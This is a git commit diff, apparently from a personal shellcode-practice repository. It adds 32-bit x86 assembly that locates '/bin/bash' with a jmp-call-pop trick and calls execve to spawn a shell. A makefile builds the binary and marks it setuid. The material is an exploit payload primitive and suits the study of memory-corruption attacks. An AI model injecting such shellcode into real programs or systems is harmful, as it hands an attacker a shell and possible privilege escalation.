From 0c7b4ed75157aa9d781e4eec92a0a604c4c45c9c Mon Sep 17 00:00:00 2001 From: Brett Weiland Date: Fri, 20 Nov 2020 17:57:20 -0600 Subject: new file: exec_cmd/makefile new file: exec_cmd/shell new file: exec_cmd/shell.asm new file: exec_cmd/shell.o new file: exec_cmd_setuid/makefile new file: exec_cmd_setuid/shell new file: exec_cmd_setuid/shell.asm new file: exec_cmd_setuid/shell.o --- exec_cmd/makefile | 5 +++++ exec_cmd/shell | Bin 0 -> 4268 bytes exec_cmd/shell.asm | 19 +++++++++++++++++++ exec_cmd/shell.o | Bin 0 -> 528 bytes 4 files changed, 24 insertions(+) create mode 100644 exec_cmd/makefile create mode 100755 exec_cmd/shell create mode 100644 exec_cmd/shell.asm create mode 100644 exec_cmd/shell.o (limited to 'exec_cmd') diff --git a/exec_cmd/makefile b/exec_cmd/makefile new file mode 100644 index 0000000..676ee34 --- /dev/null +++ b/exec_cmd/makefile @@ -0,0 +1,5 @@ +make: + nasm shell.asm -felf32 -o shell.o + ld -m elf_i386 shell.o -o shell -s + chmod u+s shell + diff --git a/exec_cmd/shell b/exec_cmd/shell new file mode 100755 index 0000000..9ea0d3b Binary files /dev/null and b/exec_cmd/shell differ diff --git a/exec_cmd/shell.asm b/exec_cmd/shell.asm new file mode 100644 index 0000000..d90d9a4 --- /dev/null +++ b/exec_cmd/shell.asm @@ -0,0 +1,19 @@ +global _start +_start: +jmp short data + +exploit: +xor eax, eax +xor ebx, ebx +xor ecx, ecx +pop edx +mov [edx + 10], eax +mov al, 11 +mov ebx, edx +xor edx, edx +int 0x80 + + +data: +call exploit +cmd: db '/bin/bash' diff --git a/exec_cmd/shell.o b/exec_cmd/shell.o new file mode 100644 index 0000000..50283e1 Binary files /dev/null and b/exec_cmd/shell.o differ -- cgit v1.2.3